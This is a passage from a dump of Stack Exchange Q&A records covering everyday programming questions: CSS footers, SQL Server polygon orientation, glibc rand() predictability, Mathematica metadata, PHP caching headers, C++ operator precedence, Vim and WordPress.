<\/li>\n <li><a href=\"#\">PORTFOLIO<\/a>\n <ul>\n 
<li><a href=\"#\">Birthday Events<\/a>\n <\/li>\n <li><a href=\"#\">Wedding Events<\/a>\n <\/li>\n <li><a href=\"#\">Anniversary Events<\/a>\n <\/li>\n <li><a href=\"#\">Other Events<\/a>\n <\/li>\n <\/ul>\n <\/li>\n <li><a href=\"#\">CONTACT<\/a>\n <\/li>\n <li><a href=\"#\">ABOUT<\/a>\n <\/li>\n <\/ul>\n <\/div>\n\n <div class=\"content\">\n <div class=\"left-content\">\n <p>All About Pixel Foto<\/p>\n <p>Nunc tincidunt, elit non cursus euismod, lacus augue ornare metus, egestas imperdiet nulla nisl quis mauris. Suspendisse a pharetra urna. Morbi dui lectus, pharetra nec elementum eget, vulputate ut nisi. Aliquam accumsan, nulla sed feugiat vehicula,\n lacus justo semper libero, quis porttitor turpis odio sit amet ligula. Duis dapibus fermentum orci, nec malesuada libero vehicula ut. Integer sodales, urna eget interdum eleifend, nulla nibh laoreet nisl, quis dignissim mauris dolor eget mi.\n Donec at mauris enim. Duis nisi tellus, adipiscing a convallis quis, tristique vitae risus. Nullam molestie gravida lobortis. Proin ut nibh quis felis auctor ornare. Cras ultricies, nibh at mollis faucibus, justo eros porttitor mi, quis auctor\n lectus arcu sit amet nunc. Vivamus gravida vehicula arcu, vitae vulputate augue lacinia faucibus. Donec volutpat nibh sit amet libero ornare non laoreet arcu luctus. Donec id arcu quis mauris euismod placerat sit amet ut metus. Sed imperdiet\n fringilla sem eget euismod. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque adipiscing, neque ut pulvinar tincidunt, est sem euismod odio, eu ullamcorper turpis nisl sit amet velit.\n Nullam vitae nibh odio, non scelerisque nibh. Vestibulum ut est augue, in varius purus. Quisque ligulas ipsum, euismod atras vulputate iltricies etri elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\n Nulla nunc dui, tristique in semper vel, congue sed ligula. Nam dolor ligula, faucibus id sodales in, auctor fringilla libero. Pellentesque pellentesque tempor tellus eget hendrerit. Morbi id aliquam ligula. Aliquam id dui sem. Proin rhoncus\n consequat nisl, eu ornare mauris tincidunt vitae. Vestibulum sodales ante a purus volutpat euismod. Proin sodales quam nec ante sollicitudin lacinia. Ut egestas bibendum tempor. Morbi non nibh sit amet ligula blandit ullamcorper in nec risus.\n Pellentesque fringilla diam faucibus tortor bibendum vulputate. Etiam turpis urna, rhoncus et mattis ut, dapibus eu nunc. Nunc sed aliquet nisi. Nullam ut magna non lacus adipiscing volutpat. Aenean odio mauris, consectetur quis consequat quis,\n blandit a nunc. Sed orci erat, placerat ac interdum ut, suscipit eu augue. Nunc vitae mi tortor. Ut vel justo quis lectus elementum ullamcorper volutpat vel libero.<\/p>\n <\/div>\n <div class=\"right-content\">\n <p align=\"center\">All About Me<\/p>\n <p>I'm Dick Roman and I foresee what I will become when I first time use a camera. I was eager to have my own camera and take elegant photos of my unforgettable moments in my life. 
It was served as my inspiration to purse and take this field of photography.\n Today I am able to render my services to my clients and I will guarantee every works I made will be best of the best<\/p>\n <ol style=\"list-style-type:none;align:center\">\n <p>Today I am rendering my skills as a:<\/p>\n <li>Image Editor<\/li>\n <li>Landscape Photograher<\/li>\n <li>Video Editor<\/li>\n <li>Web Designer<\/li>\n <\/ol>\n\n <p align=\"center\">You could drop-by to my social media profiles<\/p>\n <p align=\"center\">Just click on any links below to visit my account<\/p>\n\n <ul style=\"list-style-type:none\">\n <li>\n <a href=\"#\">Facebook<\/a>\n <\/li>\n <li><a href=\"#\">Twitter<\/a>\n <\/li>\n <li><a href=\"#\">Instagram<\/a>\n <\/li>\n <\/ul>\n <\/div>\n <\/div>\n\n <div class=\"footer\">\n <div class=\"footer-left\">\n <p>©Copyright 2016 - Codeblocks Design<\/p>\n <\/div>\n\n\n <div class=\"footer-right\">\n <p>\n <a href=\"#\">\n <img src=\"fb.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"twitter.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"instagram.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"google.png\" height=\"60%\">\n <\/a>\n <\/p>\n <\/div>\n <\/div>\n\n <\/div>\n<\/body><\/code>\nComment: Sticky does not mean fixed.\nComment: Is there any change not to use a position:fixed on the footer section? \nAs it stick even on the top position.\nI want the footer section just visible when scroll down to the bottom part\nAnswer: One easy way is to put your footer's content in a <code><footer><\/code> tag. Then apply <code>position:fixed;<\/code> to let the footer stick to the bottom.\nIf there are any margin issues after that, add this to the top of the styling\n<code>*{\n margin:0;\n}\n<\/code>\nComment: Well thank you sir .\nI apply it to my css and works like a charm\n","meta":{"source":"stackoverflow","title":"Sticky Footer not fully stick on the bottom","dup_signals":{}},"subset":"stackexchange"} +{"text":"SQL Spatial polygon inside out\n\nQuestion: I am allowing users to draw a polygon in Silverlight by clicking to draw. Then I loop through the points, convert them to longitude and latitude and then save to SQL (in a <code>geography<\/code> column).\nThe problem is that because of the world being round and all that, it only works if the user draws clockwise. Otherwise it tries to make the polygon right round the world and fails.\nSo how do I do this correctly? Do I have to work out which way they are drawing, and if so how?\nAnswer: You can check, if the result of the <code>EnvelopeAngle()<\/code> method for the geography was 180, then use the <code>ReorientObject()<\/code> function to correct it.\nHere is the sample:\n<code>--A CW polygon\nDECLARE @G3 GEOGRAPHY = 'POLYGON ((45 45, 44 45, 44 46, 45 46, 45 45))'; \nSELECT @G3.EnvelopeAngle(); --180\nSELECT @G3.ReorientObject().STAsText(); --POLYGON ((44 46, 44 45, 45 45, 45 46, 44 46))\n<\/code>\nEDIT as stated in the comments you may correct current geometries, using a simple update command (in the case you are sure they are not correct):\n<code>UPDATE foo_table SET bar_column = bar_column.ReorientObject() \n WHERE bar_column.EnvelopeAngle() > 90\n<\/code>\nComment: If you have existing entries the following query helps: `UPDATE foo_table SET bar_column = bar_column.ReorientObject() WHERE bar_column.EnvelopeAngle() > 90`\nComment: Excelent answer. You just saved my day.\nComment: @Pabloker glad to be helpful. 
You may want to see this too [link](http:\/\/stackoverflow.com\/a\/30389579\/1468295)\nAnswer: I asked a similar question recently at the GIS StackExchange. I believe I have found a SQL-only solution, which is reproduced below:\nEventually found the answer at Spatial Ed's Blog.\nSQL demonstrating the transform:\n<code>DECLARE @geom GEOMETRY = 'POLYGON ((0 0, 10 0, 10 10, 0 10, 0 0))';\nDECLARE @geog GEOGRAPHY = @geom.MakeValid().STUnion(@geom.STStartPoint()).STAsText()\n<\/code>\nAnd excerpt from Ed's post:\n\nThe key to this behavior is the the <code>STUnion()<\/code> method. Since this is an OGC-based method, working on the entire geometry for a given feature, it forces polygons into the orientation required for the method - which just happens to be the one used for the <code>Geography type<\/code> [...]. This method illustrated is quite efficient, keeping overhead small [...].\nComment: Ohh I see. I'm supposed to do it on the geometry\nComment: How did you get this working on 2008. I'm getting 'Could not find method 'MakeValid' for type 'Microsoft.SqlServer.Types.SqlGeography''\nComment: @capdragon: Did you try `MakeValid()` on a `geometry` or a `geography`?\nComment: Geography. I'm in a similar situation as you. I have Geometry, projected and converted to Geography in a separate feature class but now I get errors of \"Each geography instance must fit inside a single hemisphere. A common reason for this error is that a polygon has the wrong ring orientation.\"\nComment: How do I do this with a variable selection? For example, my POLYGON((X Y, X Y, X Y)) string is in a table. I'm not going to be manually declaring each polygon.\nComment: @ZacharyOrdo-GISP Is your `polygon` a string or a `geometry` object. If the latter, you can perhaps `CAST(foo_column.MakeValid().StUnion(foo_column.STStartPoint()).STAsText() AS GEOGRAPHY)`. Secondly, if you are on any version of SQL Server above 2008, use [the link](http:\/\/alastaira.wordpress.com\/2012\/01\/27\/ring-orientation-bigger-than-a-hemisphere-polygons-and-the-reorientobject-method-in-sql-server-2012\/) with `ReorientObject()` from [my question on GIS.SE](https:\/\/gis.stackexchange.com\/q\/66671\/20145). Lastly, if you can, do the reorientation _before save_ rather than on read.\nAnswer: If you are tied to RTM version of SqlServer 2008 you can always use sqlspatial tools from codeplex that is freely distributable and from that library just use makevalid method.\nIf you have time to play with CTP1 of SqlServer Denali you can just pickup new spatial types that can accept objects larger than a hemisphere and that have ReorientObject method to - Reorient Object if needed :)\nAnswer: That is a common concept within geospatial geography data types, a polygon is defined by a number of vertices and the edges between those vertices. However, you have to be able to distinguish between what is inside and outside of the polygon. This is done by the system assuming that one side of the edge will always be defining the inside (Different standards use left side or right side)\nIn one direction you have drawn a small circle, in the other direction you have drawn a sphere that encompasses the entire world, except for a small circle. The latter would tend to break geographic limits and raise an exception.\nIf you consider trying to draw a doughnut, you have 2 polygons and have to have the points in a clockwise \/ anti-clockwise pattern, to define the 'hole' within the centre.\nComment: Yes, I realise that. 
But what do I do about it?\nComment: you have to ignore the order the points are drawn, but read them in the appropriate order.\nComment: Number of posts on stackoverflow asking that before : http:\/\/stackoverflow.com\/questions\/242404\/sort-four-points-in-clockwise-order for example\nAnswer: Left hand rule governs this... as you 'walk' the perimeter of your polygon, your left hand must always be inside... so things should 'appear' to be digitized counter-clockwise. this hold true for donuts and polys with holes as well.\nif you keep your left hand 'inside' the polygon area you are interested in, they will be digitized in a clockwise fashion.\nA simple way to determine which one is correct is to always take the one with the SMALLER area... in just about any workflow I can thing of, there are no polygons that would be digitized that are larger than half the world...\nThe workflow would go like this: have your users create their polygons, create another polygon with the opposite orientation (ReorientObject () in SQL Server) and then compare their areas... Logically, the smallest is correct.\nJust another way to solve this.\n","meta":{"source":"stackoverflow","title":"SQL Spatial polygon inside out","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to stop running task in Automation Anywhere Enterprise Client?\n\nQuestion: I started running process and now I can't stop it. I can't start running any other process while the first one is still running, but I can't stop it either. Tried on Esc, ctrl+alt+f4 or ctrl+alt+delete, pause and x. Does somebody have a solution for this problem?\nAnswer: Open task manager and kill the <code>AAPlayer.exe<\/code> process.\n","meta":{"source":"stackoverflow","title":"How to stop running task in Automation Anywhere Enterprise Client?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to crack g++ rand()?\n\nQuestion: So, I have this:\nI know that some code was used to generate a random sequence, and it looked roughly like this:\n<code>#include <iostream>\n#include <string>\n\nint main() {\n const std::string alphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\n std::string temp = \"1234567890\";\n srand(MAGICNUMBER);\n for (int i = 0;; ++i) {\n for (int j = 0; j < 10; ++j) {\n temp[j] = alphabet[rand() % alphabet.size()];\n }\n std::cout << temp << std::endl;\n }\n}\n<\/code>\nIt was used to generate a sequence of 124660967 strings, the last of which was \"2lwd9JjVnE\", and then stopped. The compilator used was 64-bit g++ 4.8 for Linux. What I want is to find the 124660968th string \u2013 that is, the one that would have been printed next. The caveat, of course, is that I don't know the <code>MAGICNUMBER<\/code>. I'm pretty sure that it's possible to brute-force all possibilities, but it would take millennia, it seems. I've tried to snoop around in <code>rand()<\/code> source code, but I don't really understand it, much less exploit it. Is it possible to find that string in more or less reasonable time?\nUPD Is it even possible to generate what is supposed to go after my string without finding out the seed?\nComment: The compiler is (or *should be*) irrelevant in this case. The interesting part is the libc, because that's where rand() is implemented. 
And the seed is \"only\" an `unsigned int`...\nComment: @MichaelKj\u00f6rling Well, the standard does _not_ provide any details on how random should be implemented, so the compiler seems to be quite relevant, or am I wrong?\nComment: You are confusing the compiler with the standard library. The compiler only cares about (in this case) C++ *keywords*, whereas the standard library builds on top of that to make it easier to implement useful functionality by providing things like `cout`, `rand()`, `std::string` and so on.\nComment: @MichaelKj\u00f6rling, ah, I see, okay; learned something new today, I guess\nComment: Related, except about C, not C++: [How to predict C rand()?](http:\/\/security.stackexchange.com\/q\/31643\/2138)\nComment: **Why** do you want to find the one that comes next? Why can't you just generate a new random value? Note that the method isn't completely secure anyways, since `rand()` doesn't return crypto-level results, and the mod afterwards will skew to one side (since the range of the random is not a multiple of the alphabet size).\nComment: Repost? https:\/\/stackoverflow.com\/questions\/35299865\/is-there-a-way-to-find-the-next-item-in-random-sequence \n\nAnyway, `srand()` takes an unsigned integer, so why not just search the binary or memory for the number? Once you know the *MAGICNUMBER*, you can easily predict what comes next because it follows a set formula to generate random numbers. However, if you are wanting to reverse the PRNG without *MAGICNUMBER*, using only the known outputs, I suppose it is possible, but difficult. You would need to determine the internal state when the last random number was generated\nAnswer: The compiler itself is irrelevant; the <code>rand()<\/code> function is implemented in libc.\nThe glibc implementation uses a linear congruential generator (LCG) or a linear feedback shift register (LFSR) for its <code>rand()<\/code>. These can be quite easily cracked given some of the outputs (which it seems you have). The details can be found in the answer to another question already asked here, but the crux is that LCGs and LFSRs are not secure and some simple maths and probability can gain you the right answer pretty quickly.\nYou'll need to work out which version of glibc was used, but the compiler version should give you a rough idea of the patch state of the system, so you can infer it from that.\nYou can find more resources on Google, but here's a quick set of links to help:\n\nLCGs on Wikipedia\nLFSRs on Wikipedia\nCracking PHP's rand() [PDF] - relevant because it uses the glibc function for rand(), and this is covered in the paper.\nUntwister - PRNG seed recovery tool with support for rand()\nSnowflake - Another PRNG seed recovery tool\nComment: ...and this is why you should use a cryptographically secure RNG for any situation where people guessing the output is a problem. This doesn't just apply to cryptography, but also to online gaming and especially online gambling.\nComment: I suspect this is a challenge of sorts, which is why I didn't provide a \"this is how you win\" walkthrough answer. And also because that's a lot of effort. But regardless, you're right - LCG\/LFSR designs simply aren't of the right quality for security purposes.\nAnswer: Google says:\n\nIn order to generate random-like numbers, <code>srand<\/code> is usually initialized to some distinctive runtime value, like the value returned by function <code>time<\/code> (declared in header <code><ctime\\><\/code>). 
This is distinctive enough for most trivial randomization needs.\n\nIf this technique is used and you know a more or less close estimate of the time (like, if you can narrow it down to a day), a brute force attack on the left input space will probably be feasible.\nOther than that, if you follow google some more you find a series of blog entries that might lead you down the right track.\nComment: Nope, I know for granted that the seed was not time-related; so that won't work.\n\nSecondly, as I understood, `rand()` can use Mersenne Twister, but by default it is \"Linear feedback shift register\" as google and source code tell me, so that blog post doesn't seem to help much as well\nComment: The other posts in that series handle the linear congruential PRNG.\n","meta":{"source":"security.stackexchange","title":"Is it possible to crack g++ rand()?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Setting and changing MetaInformation for arbitrary objects\n\nQuestion: I work with a lot of dynamic data in <code>{{date, datum}. . .}<\/code> format,\n<code>datedatalist={{{2001, 1, 1}, 45.2}, {{2002, 1, 1}, 132.}, {{2003, 1, 2}, 121.1}};\n<\/code>\nand I have historically attached a header to each object in a format like\n<code>datedataObject={{header version, data series name, type (value, % change, etc.)}, datedatalist};\n<\/code>\nI can see advantages to using Mathematica's TemporalData[] type, and to using MetaInformation[] for recording the header. I would set this up with something like\n<code>newObject = TemporalData[datedatalist, MetaInformation -> {\"name\" -> \"whatever\", \"type\" -> \"value\"}];\n<\/code>\nand extract header items with, for example\n<code>newObject[\"name\"]\n<\/code>\nBut this leaves me with two puzzles,\n\nHow do I add MetaInformation after the object has been created? and\nHow do I change existing MetaInformation?\nAnswer: What about this?\nLoad your sample data\n<code>datedatalist={{{2001, 1, 1}, 45.2}, {{2002, 1, 1}, 132.}, {{2003, 1, 2}, 121.1}};\nct = TemporalData[datedatalist, MetaInformation -> {\"name\" -> \"whatever\", \"type\" -> \"value\"}];\n<\/code>\nModify its meta information\n<code>ct=TemporalData[ct, MetaInformation->{\"name\"->\"Johnny\", \"fat\"->True}];\nct[\"MetaInformation\"]\n(* {\"name\" -> \"Johnny\", \"fat\" -> True, \"type\" -> \"value\"} *)\n<\/code>\nComment: @MichaelStern luck. I just felt it was sensible for nested temporal data's to be flattened out, tried it and worked.\nComment: To make this more general I would suggest to use the information contained in the first part of the `TemporalData` object. For example, `addMetaInformation[ td_, metarules_ ] := Which[ td[[1]] === TimeSeries, TimeSeries[ td, MetaInformation -> metarules], ...=== EventSeries, EventSeries[...], True, TemporalData[ td, MetaInformation -> metarules ]`. Also one might define `addMetaInformation[ td_, None] := td \/. (MetaInformation -> _) :> Sequence[]`.\nComment: Very nice. 
How did you figure that out?\nAnswer: I sure hope there is a cleaner way to get both tasks than the following which is based on accessing and changing <code>Part<\/code>s of a temporal data object:\n<code> s = Accumulate[\n RandomInteger[{-5, 1}, 10]~Join~RandomInteger[{-1, 5}, 10]]; \n td = TemporalData[s, {1, 20}];\n td[\"Properties\"]\n(* {\"Part\",\"Path\",\"PathComponents\",\"PathCount\",\"PathFunction\",\n \"PathFunctions\",\"PathLengths\",\"Paths\",\"PathStates\",\"PathTimes\",\n \"Properties\",\"SliceData\",\"SliceDistribution\",\"StateDimensions\",\n \"States\",\"Times\"} *)\n<\/code>\nAdd <code>MetaInformation<\/code>:\n<code> td[[2, -1]] = AppendTo[td[[2, -1]], MetaInformation -> {\"Event\" -> 10}];\n td[\"Properties\"]\n (* {\"Event\",\"Part\",\"Path\",\"PathComponents\",\"PathCount\",\"PathFunction\",\n \"PathFunctions\",\"PathLengths\",\"Paths\",\"PathStates\",\"PathTimes\",\n \"Properties\",\"SliceData\",\"SliceDistribution\",\"StateDimensions\",\n \"States\",\"Times\"} *)\n\n td[\"Event\"]\n (* 10 *)\n<\/code>\nChange the value of a <code>MetaInformation<\/code> element:\n<code> d[[2, -1, 1, 2, 1, 2]] = 20;\n td[\"Event\"]\n (* 20 *)\n<\/code>\nAdd another <code>MetaInformation<\/code> element:\n<code> td[[2, -1, 1, 2]] = AppendTo[td[[2, -1, 1, 2]], \"name\" -> \"abc\"]; \n td[\"MetaInformation\"]\n (*{\"Event\" -> 20,\"name\" ->\"abc\"} *)\n td[\"name\"]\n (* \"abc\" *)\n<\/code>\nNote: This approach works in version 220.127.116.11. Version 10 seems to have quite a few new features related to <code>TemporalData<\/code>. However, documentation information related to <code>MetaInformation<\/code> has not changed.\nComment: This works in V10, not in V9: `td = TemporalData[td, \"MetaInformation\" -> {\"Event\" -> 20}]`\nComment: @MichaelE2, right. `MetaInformation->...\" (without string quotes) also works in Version 10. Although documentation on `MetaInformation` says the values can be changed using `SetOptions` it does not work for `TemporalData`. And, although `MetaInformation` is listed as an `Option` for `TemporalData`, `Options[td]` gives `{}`; and one needs to use `td[\"Options\"]` to get `MetaInformation -> {...}`.\nComment: Yes, the quotes were a typo that happened to work.\nComment: I think the ultimate solution will have to come from Wolfram, but I appreciate the kludge in the meantime.\nAnswer: David Reiss came up with a nice kludge over in the Wolfram Communities --\n<code>newObject = newObject \/. {(\"name\" -> _) :> (\"name\" -> \"Happy feet\")}\n<\/code>\nchanges the \"name\" part of the MetaInformation in newObject. And\n<code>newObject = \n newObject \/. {(MetaInformation -> x_) :> (MetaInformation -> Flatten[{x, \"another\" -> \"Something\"}])} \n<\/code>\nadds the \"another\" -> \"Something\" rule to the MetaInformation of newObject.\nThis does seem like a bug in Mathematica though; the behavior is illogical and at odds with the documentation.\nComment: Seems to me that if designed \"properly\" it should work with `SetOptions` and also probably `CurrentValue` (analogous to how `TaggingRules` works). I wonder if this is a bug or intentional? Have you asked tech support about this?\nComment: I reported this as a bug. 
They haven't responded, but I don't think I ever get responses to bug reports.\nComment: They never use the word \"bug\" but normally I get a reply saying that it has been forwarded to developers and I'll be emailed when an update occurs ...or words to that effect.\nComment: I had an exchange with tech support and provided them with a detailed notebook. They have \"reported this issue into [their] database.\"\nComment: @MikeHoneychurch Hah. Tech support says that this behavior is \"by design.\" I asked them to record it as a bug anyway.\nComment: WTF! So they are now designing things that are broken???\nComment: @MikeHoneychurch I think the tech support person may not have been one of Wolfram's best. With any luck, my example notebook will filter through to a developer.\n","meta":{"source":"mathematica.stackexchange","title":"Setting and changing MetaInformation for arbitrary objects","dup_signals":{}},"subset":"stackexchange"} +{"text":"Xpages getting field value knowing the UNID of the document\n\nQuestion: Is there a way I can get the field value of a document if I know the document UNID?\nI have the following code:\n<code>var a = database.getDocumentByUNID(sessionScope.unid);\n<\/code>\n\nsessionScope.unid contains the documentUNID.\n\nI can't see any methods avaible if I do <code>a.<\/code> . Is there something wrong?\nAnswer: SSJS does not provide typeahead unless you specifically cast variables as the class you wish to use. So to get typeahead you need to use:\n<code>var a:NotesDocument = database.getDocumentByUNID(sessionScope.unid);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Xpages getting field value knowing the UNID of the document","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set expires headers without enabling mod_expires or mod_headers possible in php?\n\nQuestion: I'm building a guestbook in php. When I checked the page with a SEO-checker it said that I should set expires headers. It's the very first time I'm working with expires headers and I've tried adding them in the .htaccess-file which failed as neither mod_expires nor mod_headers is on on the server and I won't be able to change it. My question is, if there is a possibility to set these expires headers in my php code without having mod_expires or mod_headers on? If so, how would I have to implement it in my code so that it'll work? And if you want to give me the answer \"with header(....)\" please explain how to set this up and where to put this, I don't just wanna copy-paste code, I want to learn how to do it.\nI would like to set expires headers for images (jpg\/jpeg\/gif\/png) as well (if possible) for my stylesheet (css).\nDown below I listed the questions on StackOverflow which I've already checked, but some of them are really hard to understand for a newbie like me or they never really get an answer. Some of them never say where to implement the code snippets, which makes it hard to use an accepted answer.\nI'm very new with programming web-pages, so please write explanations why I should do what, so I'll learn it for the future. If you need any more information, please don't hesitate to write so in the comments. I'll try to answer whatever I can. 
Thank you.\n(Already checked questions:\n\nExpires Headers Not Working\nSetup HTTP expires headers using PHP and Apache\nAdd expires header without mod_expires?\nHow do I configure apache - that has not got mod_expires or mod_headers - to send expiry headers?\nApache: How to add Expires headers to files without mod_expires installed\nand some more...\n\n)\nPHP-Version: 7.0.10\n(PS: I don't know why mod_headers and mod_expires aren't on, but I'm sure that the company won't change it just for my small project.)\nAnswer: You cannot set something with PHP where PHP is not involved in. Generally your webserver serve images and static files, so the webserver have to handle the expire headers for you. All other things, for example serve images with PHP is really not recommended and requires a lot more work than just configuring the webserver properly.\nSo, expire headers for static files (images, javascript, etc...) is managed by your webserver, not PHP.\nTip: On most default webhosting services is apache installed, so you can use a <code>.htaccess<\/code> file to set those things properly.\nEdit, more explanation:\nYou must difference between for what files you want to set expire headers. For sure, you can set expire header in your PHP files too but this only affect the pages that are served from PHP. And php is mostly used to display dynamic web pages, so an expire header here makes no sense. Static images and all those files never get passed to PHP so you have to set expire in the webserver config. And because images and other static files are static files that not change (or not often) it is recommend to set expire header to allow the browser to cache it properly\nComment: @Kathara You must difference between for what files you want to set expire headers. For sure, you can set expire header in your PHP files too but this only affect the pages that are served from PHP. And php is mostly used to display dynamic web pages, so an expire header here makes no sense. Static images and all those files never get passed to PHP so you have to set expire in the webserver config. And because images and other static files are `static` files that not change (or not often) it is recommend to set expire header to allow the browser to cache it properly.\nComment: why would you set expires headers in the first place then? And why in some answers I saw them set expires headers in php? Also I already wrote that I tried to use the .htaccess file which didn't work as neither mod_expires nor mod_headers are enabled....\nComment: Thanks for the clarifications. You wouldn't know of any other way to set the expires headers without mod_expires or mod_headers?\nComment: @Kathara With apache, there is not other way as far as i know. If your hosting provider don't support that and not will give you such features, i recommend to switch. This are basic's that every provider should provide.\nComment: Thank you very much for your help. I'll mark your answer as correct as you helped me clarify this. 
I'll see if I can get my company to help me install the mod_expires and mod_headers on the server.\n","meta":{"source":"stackoverflow","title":"Set expires headers without enabling mod_expires or mod_headers possible in php?","dup_signals":{}},"subset":"stackexchange"} +{"text":"false || true giving 0 in MinGW Compiler v 6.3.0-1\n\nQuestion: This is a C++ program I wrote:\n<code>#include <iostream>\nusing namespace std;\n\nint main() {\n\n cout << \"\\n\" << \"false || false\" << \": \" << false || false;\n cout << \"\\n\" << \"false || true\" << \": \" << false || true;\n cout << \"\\n\" << \"true || false\" << \": \" << true || false;\n cout << \"\\n\" << \"true || true\" << \": \" << true || true;\n cout << \"\\n\" << \"false && false\" << \": \" << false && false;\n cout << \"\\n\" << \"false && true\" << \": \" << false && true;\n cout << \"\\n\" << \"true && false\" << \": \" << true && false;\n cout << \"\\n\" << \"true && true\" << \": \" << true && true;\n\n return 0;\n}\n<\/code>\nand this is the output.\n<code>false || false: 0\nfalse || true: 0\ntrue || false: 1\ntrue || true: 1\nfalse && false: 0\nfalse && true: 0\ntrue && false: 1\ntrue && true: 1\n<\/code>\nCould someone explain to me why <code>false || true<\/code> is giving <code>0<\/code> ? I am using MinGW C++ Compiler version 6.3.0-1.\nComment: Wrap the expression in parenthesis.\nComment: @0x499602D2: Oh okay. Thank you.\nAnswer: According to C++ Operator Precedence, <code>operator<<<\/code> has higher precedence than <code>operator ||<\/code> (and <code>operator &&<\/code>), so <code>cout << false || true;<\/code> will be interpreted as if <code>(cout << false) || true;<\/code>; you'll always get <code>false<\/code> to be printed out.\nTo solve the issue you should add parentheses to specify the precedence explicitly, e.g. <code>cout << (false || true);<\/code>.\nComment: Ahh okay. Got it. Thanks a lot @songyuanyao.\n","meta":{"source":"stackoverflow","title":"false || true giving 0 in MinGW Compiler v 6.3.0-1","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the difference between Gvim and Vim?\n\nQuestion: Could someone please explain to me the differences between Gvim and Vim?\nAnswer: GVim is Vim with a built-in GUI, whereas plain Vim needs a terminal emulator (like GNOME Terminal, for example) to run.\nThe built-in GUI provides several extra features to GVim. Borrowing from a post in the Vi and Vim Stack Exchange:\n\nSome features that will only work with gVim:\n\nSupports a much wider range of colors (RGB), while the terminal only supports 256 colors (see this and this).\nSome other more advanced graphical features, such as \"wiggly lines\" for spell checking, more flexible cursor shapes, etc. A terminal can\n only do \"blocks of monospaced characters\".\nEnables mouse support, if otherwise left alone (including drag-and-drop for files). Terminal Vim can also handle the mouse\n quite well, but not drag-and-drop.\nOffers a nice, customizable menu system, where each option has the corresponding Vim command listed.\ngVim can offer you scrollbars which scroll the Vim buffer (and not the Terminal scrollback).\nYou can have popup \"balloons\" (aka. 
\"tooltips\").\nMany terminals do not provide true italics like gVim does.\nHas integrated font support.\n\nSecondly, even if you prefer using Vim, installing a GUI version may\n offer more compile-time features than the version without, at least in\n some distros (such as <code>clipboard<\/code> and <code>clientserver<\/code> support on\n Debian-based system in <code>vim-nox<\/code> vs <code>vim-gnome<\/code>).\nThings gVim doesn't do:\n\ngVim isn't a (full) terminal emulator, so starting external programs that use a lot of terminal features won't work very well. For example\n try using <code>:!vim<\/code>, <code>:!mutt<\/code>, or <code>:!irssi<\/code> from gVim, or pressing K\n over a word (which, by default, opens the manpage for that word). Also\n see this.\nAnswer: Both GVim and Vim are the same, the difference is that Gvim offers an interface that doesn't run in a terminal window. Basically, Gvim has GUI-like menus and toolbar.\nHere are quotes from Quora that provide more information:\n\nVIM is designed for using the keyboard efficiently and not for using\nthe mouse.\nFunctionally there is no difference between VIM and GVIM. They both\nwork the same and have same keyboard sequences. VIM does not need a\nGraphical User Interface (GUI) and uses terminal shell environment to\nprovide text editing features. However GVIM (or MVIM on mac) uses X\nwindowing system (like GTK+) to provide a desktop like window\nappearance to vim with all text editing features. Performance wise\nalso both vim and gvim behave almost identically.\nApart from this, there are few addition operations supported by GVIM\nlike\n\nMore font and better text rendering support in gvim.\nGVIM has additional menu and tool bars which vim lacks\n","meta":{"source":"askubuntu","title":"What is the difference between Gvim and Vim?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Function to Change Page Title In Wordpress\n\nQuestion: I am using the below function to change the page title in wordpress. It is working on a single page (page.php), but is not working on my static home page or individual posts (single.php).\nWhat do I need to change in order to make this work across the entire site?\n<code><?php\n\nfunction wpse46249_filter_wp_title( $title ) {\n\n $some_custom_title_content = 'This is added to title';\n\n $custom_title = $title . $some_custom_title_content;\n\n return $custom_title;\n}\nadd_filter( 'wp_title', 'wpse46249_filter_wp_title' );\n?>\n<\/code>\nComment: do you want to set same page title for all posts?\nComment: @HelpingHands, no. That code is appending something to the original `$title` that is passed in.\nComment: @user1609391...this sounds like a template issue.\nComment: Can you paste the code which prints the `title` on `single.php`\nAnswer: <code>function wpse46249_filter_wp_title( $title ) {\n\n $some_custom_title_content = 'This is added to title';\n\n $custom_title = $title . $some_custom_title_content;\n\n return $custom_title;\n}\nadd_filter( 'the_title', 'wpse46249_filter_wp_title' );\n<\/code>\nplease note the title is saved in wp_posts table. The filter you used above will change all new posts titles being saved. This filter just modifys the title after pulling it from the db and doesn't actually change the db value. 
\nAlso will only work on pages where the_title() is called.\n","meta":{"source":"stackoverflow","title":"Function to Change Page Title In Wordpress","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why i am not able to view my Listview in android?\n\nQuestion: Im trying to pass some info from my fragment to my adapter to show a ListView and it does pass but the ListView doesnt show anything after its done loading.\nI am attaching my CustomAdapter class below. \npackage com.example.rama.hello.Adapters;\n<code>import android.app.Activity;\nimport android.content.Context;\nimport android.graphics.Bitmap;\nimport android.graphics.BitmapFactory;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.ArrayAdapter;\nimport android.widget.BaseAdapter;\nimport android.widget.ImageView;\nimport android.widget.TextView;\nimport com.example.rama.hello.Bean.RowItem;\nimport com.example.rama.hello.R;\n\nimport java.io.File;\nimport java.util.ArrayList;\nimport java.util.List;\n\n\/**\n * Created by RAMA on 10\/25\/2016.\n *\/\npublic class CustomAdapter extends ArrayAdapter<RowItem> {\n\n Context mcontext;\n ArrayList<RowItem> rowItem = new ArrayList<RowItem>();\n private RowItem row;\n RowItem data;\n\n public CustomAdapter(Context context, int resourceId,\n ArrayList<RowItem> items) {\n super(context, resourceId, items);\n this.mcontext = context;\n }\n\n @Override\n public int getCount()\n {\n return rowItem.size();\n }\n\n @Override\n public long getItemId(int position) {\n return rowItem.indexOf(getItem(position));\n }\n\n @Override\n public View getView(int position, View convertView, ViewGroup parent)\n {\n if (convertView == null)\n {\n LayoutInflater mInflater = (LayoutInflater) mcontext\n 